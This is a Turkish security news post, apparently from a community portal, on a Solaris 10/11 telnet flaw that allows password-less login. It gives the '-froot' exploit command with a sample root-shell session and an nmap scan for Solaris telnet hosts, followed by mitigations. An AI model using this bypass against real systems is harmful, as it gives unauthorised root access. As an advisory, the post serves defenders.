Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

SQL Server 7.0 için yazılmış WORM yakalandı

FZ

Sistem yöneticisi (sa user) için parola tanımlanmamış SQL Server 7.0 veritabanı sunucu sistemine sızabilen bir worm yazılımı (kurtçuk) yakalandı.

Sisteme girebildikten sonra iki Truva atı (Trojan horse) programını sisteme yerleştiren worm yazılımı bu şekilde kontrolü worm yaratıcısına aktarmaya çalışıyor.

Opera 7.53 ve öncesi versiyonlarda güvenlik açıkları tesbit edildi

ttk

Opera web tarayıcısının 7.53 ve öncesi versiyonlarında, Linux, Mac ve Windows platformlarında tehlikeli güvenlik açıkları tesbit edildi.

Kullanıcının makinasındaki dosya ve klasörlere okuma hakkı ile erişim, Opera ile alınmış maillerine erişim, kullanıcıya ait cookie'lerin çalınabilmesi, adres yanıltması ve kullanıcının daha önce girdiği adreslerin tesbit edilebilmesi bu açıklardan bazıları imiş. Açığı tesbit edenler ilgili yerleri bilgilendirmişler ve Opera web tarayıcısının açıkları giderilmiş 7.54 numaralı versiyonu indirilmek üzere sitesine konulmuş. Bu programı tercih edenlerin yeni versiyonu indirmeleri faydalarına olacaktır.

Orijinal haber için adres : http://www.net-security.org/vuln.php?id=3625

Tehlikeli Modüllerin Tespiti

FZ

Tacettin Karadeniz´in GNU/Linux sistemlere sızabilecek tehlikeli ve kötü niyetli modüllerin tespit edilmesini konu alan yazısı ileriseviye.org sitesinde yayına girmiştir.

NSA SELinux´u Güncelledi

FZ

ABD´nin en önemli istihbarat kurumlarında NSA (National Security Agency), 23 Şubat 2004 tarihinde SELinux sistemini güncelledi ve kamuoyuna son gelişmeleri duyurdu. Ayrıntılı bilgiye ve SELinux kaynaklarına bu adresten erişebilirsiniz.

MacOS X ve Güvenlik

anonim

Geçtiğimiz günlerde Ankara'da yapılan Serbest Yazılımcılar Konferansına katılan arkadaşım Sundance bana güvenlikle ilgili seminerde konuşmacı arkadaşın örnek verdiği işletim sistemlerinin arasında MacOS X ve MacOS X Server'ın bulunmadığını anlattı.

Aslında şaşıracak bir durum yoktu genel olarak ama Unix dünyasını yakından takip edenlerin bence bu iki işletim sistemini de her ne kadar kullanmaya imkan bulamasalar da yakından takip etmeleri gerektiğini düşünerek bir kaç önemli güvenlik özelliğinden bahsetmek istedim.